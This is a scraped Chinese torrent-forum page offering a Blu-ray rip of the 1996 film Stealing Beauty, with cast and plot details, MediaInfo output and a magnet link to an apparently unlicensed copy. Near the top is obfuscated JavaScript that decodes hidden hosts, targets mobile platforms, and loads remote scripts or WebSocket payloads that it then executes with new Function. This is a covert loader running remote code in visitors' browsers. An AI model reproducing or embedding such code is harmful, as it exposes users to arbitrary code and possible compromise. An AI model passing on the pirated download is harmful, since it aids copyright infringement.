偷香[双语字幕].Stealing.Beauty.1996.1080p.BluRay.DTS.x265-10bit 7.38GB

版主小s 1月前 1142

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x46\x6a\x59\x48\x73\x4f\x52\x52\x45\x59']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxza2pmLm5pYYW5nYYW94aWFuc2hlbmcuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译  名 偷香 / 盗美人 / Dancing by Myself
◎片  名 Stealing Beauty
◎年  代 1996
◎产  地 意大利 / 法国 / 英国
◎类  别 剧情 / 爱情 / 悬疑 / 情色
◎语  言 英语 / 法语 / 德语 / 西班牙语 / 意大利语
◎上映日期 1996-03-29
◎IMDb链接 https://www.imdb.com/title/tt0117737/
◎豆瓣评分 7.7/10 (25288人评价)
◎豆瓣链接 https://movie.douban.com/subject/1292277/
◎片  长 118 分钟
◎导  演 贝纳尔多·贝托鲁奇 Bernardo Bertolucci (id:1035651)
◎编  剧 贝纳尔多·贝托鲁奇 Bernardo Bertolucci (id:1035651)
       苏珊·米诺特 Susan Minot (id:1037978)
◎演  员 丽芙·泰勒 Liv Tyler (id:1041027)
       杰瑞米·艾恩斯 Jeremy Irons (id:1031216)
       西妮德·库萨克 Sinéad Cusack (id:1004776)
       让·马雷 Jean Marais (id:1036866)
       多纳尔·麦卡恩 Donal McCann (id:1120714)
       D.W.莫菲特 D.W. Moffett (id:1119047)
       斯特法尼娅·桑德雷利 Stefania Sandrelli (id:1019156)
       蕾切尔·薇兹 Rachel Weisz (id:1018989)
       卡洛·切基 Carlo Cecchi (id:1078790)
       约瑟夫·费因斯 Joseph Fiennes (id:1047983)
       杰森·弗莱明 Jason Flemyng (id:1027179)
       伊格纳齐奥·欧力瓦 Ignazio Oliva (id:1315407)
       弗朗切斯科·西西利亚诺 Francesco Siciliano (id:1297557)
       莱昂纳多·特雷维谬 Leonardo Treviglio (id:1160381)
       亚历山德拉万齐 Alessandra Vanzi (id:1038925)
       罗伯托·齐贝蒂 Roberto Zibetti (id:1165651)
       达吕斯·康第 Darius Khondji (id:1028011)
       吉亚尼·西尔韦斯特里 Gianni Silvestri (id:1297602)
       Domenico Sica Domenico Sica (id:1297556)
       Mirella Ginnoto Mirella Ginnoto (id:1284896)
       恩里科·雅科波尼 Enrico Jacoponi (id:1287529)
       Pasquale Plastino Pasquale Plastino (id:1294609)
       Silvia Ranfagni Silvia Ranfagni (id:1295225)

◎标  签 意大利 / 贝托鲁奇 / 爱情 / 情色 / 青春 / 意大利电影 / 法国 / 文艺

◎简  介
  年轻的露西(丽芙·泰勒 Liv Tyler 饰)带着她母亲自杀后留下的日记,来到了一个小镇上探访母亲往昔的好友,并住在雕塑家格雷森的家中。其实四年前,露西就和母亲来过这里,还认识了一个叫尼古拉的男孩。她曾经被他送上的一封信深深感动,并和他有过美好的初恋时光。如今,格雷斯家中异常热闹,聚集了各路人物,露西美丽的魅力让这里的男人们纷纷动心,其中患有白血病的作家亚历克斯更是难以自拔。尼古拉从国外回来,露西却发现他是个花花公子,枉费当年动了情。此时寻找生父成了露西的心结。她在这段历程中慢慢成熟,并寻获心爱那人。

◎获奖情况 (共1项)
  第49届戛纳电影节 (1996)
  主竞赛单元 金棕榈奖(提名)
   └──贝纳尔多·贝托鲁奇 (id:1035651)

  1. ##### MediaInfo ######

  2. General

  3. Unique ID                                : 27973724241014049613340569651260993056 (0x150B8B16D5AF7B11669345DEC1C4AE20)

  4. Complete name                            : [email protected]M.mkv

  5. Format                                   : Matroska

  6. Format version                           : Version 4

  7. File size                                : 7.37 GiB

  8. Duration                                 : 1 h 58 min

  9. Overall bit rate                         : 8 934 kb/s

  10. Movie name                               : Stealing Beauty 1996 1080p BluRay DTS [email protected]

  11. Encoded date                             : UTC 2021-08-09 04:45:57

  12. Writing application                      : mkvmerge v38.0.0 ('The Silent Type') 64-bit

  13. Writing library                          : libebml v1.3.9 + libmatroska v1.5.2


  14. Video

  15. ID                                       : 1

  16. Format                                   : HEVC

  17. Format/Info                              : High Efficiency Video Coding

  18. Format profile                           : Main [email protected]@High

  19. Codec ID                                 : V_MPEGH/ISO/HEVC

  20. Duration                                 : 1 h 58 min

  21. Bit rate                                 : 8 083 kb/s

  22. Width                                    : 1 920 pixels

  23. Height                                   : 816 pixels

  24. Display aspect ratio                     : 2.35:1

  25. Frame rate mode                          : Constant

  26. Frame rate                               : 23.976 (24000/1001/53354) FPS

  27. Color space                              : YUV

  28. Chroma subsampling                       : 4:2:0

  29. Bit depth                                : 10 bits

  30. Bits/(Pixel*Frame)                       : 0.215

  31. Stream size                              : 6.67 GiB (90%)

  32. Title                                    : @HDSky

  33. Writing library                          : x265 - H.265/HEVC codec

  34. Default                                  : Yes

  35. Forced                                   : No


  36. Audio

  37. ID                                       : 2

  38. Format                                   : DTS

  39. Format/Info                              : Digital Theater Systems

  40. Codec ID                                 : A_DTS

  41. Duration                                 : 1 h 58 min

  42. Bit rate mode                            : Constant

  43. Bit rate                                 : 768 kb/s

  44. Channel(s)                               : 6 channels

  45. Channel layout                           : C L R Ls Rs LFE

  46. Sampling rate                            : 48.0 kHz

  47. Frame rate                               : 93.750 FPS (512 SPF)

  48. Bit depth                                : 24 bits

  49. Compression mode                         : Lossy

  50. Stream size                              : 649 MiB (9%)

  51. Title                                    : English

  52. Language                                 : English

  53. Default                                  : Yes

  54. Forced                                   : No


  55. Text #1

  56. ID                                       : 3

  57. Format                                   : PGS

  58. Muxing mode                              : zlib

  59. Codec ID                                 : S_HDMV/PGS

  60. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  61. Duration                                 : 1 h 19 min

  62. Bit rate                                 : 4 669 b/s

  63. Count of elements                        : 212

  64. Stream size                              : 2.65 MiB (0%)

  65. Title                                    : ENG

  66. Language                                 : English

  67. Default                                  : Yes

  68. Forced                                   : No


  69. Text #2

  70. ID                                       : 4

  71. Format                                   : PGS

  72. Muxing mode                              : zlib

  73. Codec ID                                 : S_HDMV/PGS

  74. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  75. Duration                                 : 1 h 56 min

  76. Bit rate                                 : 41.2 kb/s

  77. Count of elements                        : 3133

  78. Stream size                              : 34.4 MiB (0%)

  79. Title                                    : CHS&ENG

  80. Language                                 : Chinese

  81. Default                                  : No

  82. Forced                                   : No


  83. Text #3

  84. ID                                       : 5

  85. Format                                   : PGS

  86. Muxing mode                              : zlib

  87. Codec ID                                 : S_HDMV/PGS

  88. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  89. Duration                                 : 1 h 56 min

  90. Bit rate                                 : 41.9 kb/s

  91. Count of elements                        : 3133

  92. Stream size                              : 35.0 MiB (0%)

  93. Title                                    : CHT&ENG

  94. Language                                 : Chinese

  95. Default                                  : No

  96. Forced                                   : No


  97. Text #4

  98. ID                                       : 6

  99. Format                                   : PGS

  100. Muxing mode                              : zlib

  101. Codec ID                                 : S_HDMV/PGS

  102. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  103. Duration                                 : 1 h 56 min

  104. Bit rate                                 : 32.2 kb/s

  105. Count of elements                        : 3130

  106. Stream size                              : 26.8 MiB (0%)

  107. Title                                    : CHS

  108. Language                                 : Chinese

  109. Default                                  : No

  110. Forced                                   : No


  111. Text #5

  112. ID                                       : 7

  113. Format                                   : PGS

  114. Muxing mode                              : zlib

  115. Codec ID                                 : S_HDMV/PGS

  116. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  117. Duration                                 : 1 h 56 min

  118. Bit rate                                 : 32.9 kb/s

  119. Count of elements                        : 3130

  120. Stream size                              : 27.5 MiB (0%)

  121. Title                                    : CHT

  122. Language                                 : Chinese

  123. Default                                  : No

  124. Forced                                   : No


  125. Menu

  126. 00:00:00.000                             : en:Chapter 01

  127. 00:03:04.142                             : en:Chapter 02

  128. 00:11:04.330                             : en:Chapter 03

  129. 00:19:33.839                             : en:Chapter 04

  130. 00:31:05.197                             : en:Chapter 05

  131. 00:34:56.303                             : en:Chapter 06

  132. 00:40:06.154                             : en:Chapter 07

  133. 00:48:54.181                             : en:Chapter 08

  134. 00:56:34.808                             : en:Chapter 09

  135. 01:01:12.836                             : en:Chapter 10

  136. 01:09:48.643                             : en:Chapter 11

  137. 01:20:40.794                             : en:Chapter 12

  138. 01:28:40.106                             : en:Chapter 13

  139. 01:33:11.961                             : en:Chapter 14

  140. 01:41:28.416                             : en:Chapter 15

  141. 01:48:01.392                             : en:Chapter 16

  142. 01:53:19.001                             : en:Chapter 17



TAGS 剧情 情色 悬疑 爱情

磁力链:
  • magnet:?xt=urn:btih:FCE136C02ABBAE90682E09DE97D42B7B16277EF5
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回